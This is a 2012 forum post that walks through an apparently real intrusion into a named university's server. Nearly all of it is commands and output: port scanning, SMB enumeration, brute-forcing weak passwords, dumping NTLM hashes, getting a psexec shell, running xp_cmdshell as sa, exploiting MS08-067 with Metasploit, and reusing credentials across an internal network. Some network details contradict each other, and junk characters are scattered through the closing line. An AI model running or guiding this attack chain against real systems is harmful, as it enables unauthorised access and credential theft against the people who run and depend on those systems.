nmap+msf intrusion into Guangxi Normal University

Views: 4200 | Replies: 0

OP, posted 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the accounts that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// recover user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"    // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target for known vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole    // exploit MS08-067 against the target from msf
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator
root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try to log in across the whole internal range with the usernames and the hash we obtained

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

' ]7 _6 }+ R# o2 q+ Y. O攻击成功,一个简单的msf+nmap攻击~~·6 [$ p& Q: r& X% e5 A1 {: j4 e1 j8 O